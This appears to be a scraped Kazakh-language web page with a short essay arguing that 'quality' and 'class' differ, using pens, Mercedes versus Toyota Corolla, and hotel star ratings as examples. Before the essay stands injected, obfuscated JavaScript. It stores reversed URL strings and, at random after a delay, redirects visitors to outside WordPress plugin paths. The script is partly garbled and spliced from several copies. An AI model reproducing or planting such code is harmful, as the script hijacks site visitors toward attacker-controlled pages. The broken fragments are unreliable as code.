$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/Mercedes_Benz_C-Class.jpg» width=»221″ height=»148″ />«Сапа», «класс» ұғымдары көп жағдайда бөле-жара айтылмайды. Бұл адамдардың сапа мен заттың құнын, көрінісін т.б. жағдайларды шатастырып алуынан туындайтын жайт.
Егер ең қымбат, кез-келгеннің қолына түсе бермейтін «Паркер» қаламсабын, өте аз мерзімге пайдалануға арналған «ВІС» қаламсабымен салыстырар болсақ, көпшілік «Паркер» сапалы дегенді айтқан болар еді. Сол сияқты «Мерседестің» өте сапалы автокөлік екеніне шүбә келтірмейтін замандастарымыз да аз емес. Көптеген елдерде бұл пікірдің сіңісті болғаны соншалық «Мерседестің» сапасы «Тоиотадан» жоғары дегенді ойланбастан айтатындардың саны көп. Егер салыстыру мақсатында айтылған жоғарыдағы мысалдарға сыни көзбен қарайтын болсақ, қарапайым жұртқа беймәлім бірталай жайттың бетін ашқан болар едік. Қаламсап жазу,ал автокөлік жол жүру үшін керек. Екі заттың да адам үшін пайдалы қызметі осы. Ендеше «Паркер»қаламсабы цехтың шебері немесе бригадирі үшін қолайлы ма? Әрине, жоқ. Өйткені жұмыс қайнап жатқан өндірісте жүріп қолыңдағы затты кез-келген сәтте бүлдіріп алуға болады. Ал «ВІС» қаламсабын асығып бара жатып бетонға түсіріп алдың не, бетін сырып алдың не бәрібір жазуға жарайды.
Екінші жағдай, сізде «Паркер» қаламсабы бар, әрі сіз осы қымбат қаламсап жоғалып қалса өкіне қоймайтын аса бақуатты жансыз. Әлгі қаламсабыңызды қатты жерге түсіріп алдыңыз делік. Не болды? Жарқырап тұрған заттың бүлінгені қанша дегенмен көңіліңізге қаяу салады. Пенде болған соң қаласаңыз да қаламасаңыз да құны 10-15 теңге емес, одан он-он бес есе артық еді ғой деген ой зу ете қалады.
Біздің айтпағымыз бұл зат өзінің жұмыстары жақсы жүріп жатқанын көрсеткісі келетін, жылы әрі ыңғайлы жабдықталған кеңседе отыратын басшылар, қызметкерлер үшін қажет бұйым. Атқаратын қызметі бір қаламсаптардың түрлі талаптарға жауап беретінін енді байқаған боларсыз. Сол сияқты жоғары класты «Мерседес» автокөлігі де, өзінің дәреже-деңгейін көрсеткісі келетіндер үшін қолайлы. Көптеген адамдардың мұндай қымбат көлік алуға жағдайы келмейді және бұл көлік олардың талаптарын да қанағаттандыра бермейді Керісінше, «Тоиота» «Королла» қолжетімді көлік, әрі бұл темір тұлпарда ақылға сиятын қауіпсіздік деңгейі мен жанға жайлы жағдай қамтамасыз етілген.
Германияның автомобиль мәселесіне арналған журналдары жүргізген статистикалық зерттеулер бойынша Королланың сенімді көлік көшін бастауы жайдан-жай емес. Мұндай мысалдарды қонақ үй қызметіне қатысты келтіруге де болады.Бесжұлдызды, ендеше мұнда қызмет сапасы да жоғары деген көзқараста қалыпқа түсіп қалған. Бірақ бұл қызметті көп пайдаланғандар жағдайдың бұлай еместігіне көз жеткізіп үлгерген. Екі, үш жұлдызды қонақ үйлерде жоғары сапалы қызмет көрсете алады. Онда келушілерге деген ниет те, қарым-қатынаста өзінше ерекше. Жұлдыз саны қонақ үйлерге көрсететін қызметі мен құрал-жабдықтары (мейрамхана, спортзал, сауна, әсемдік салоны, бассейн, т.б) үшін беріледі. Бірақ бұл жоғары сапалы қызмет көрсетеді дегенді айтпайды. Сондықтан да бес жұлдызды қонақ үйдің өзінде қызмет көрсету сапасының төмен болуы ғажап емес.{jcomments on}
Leave a Reply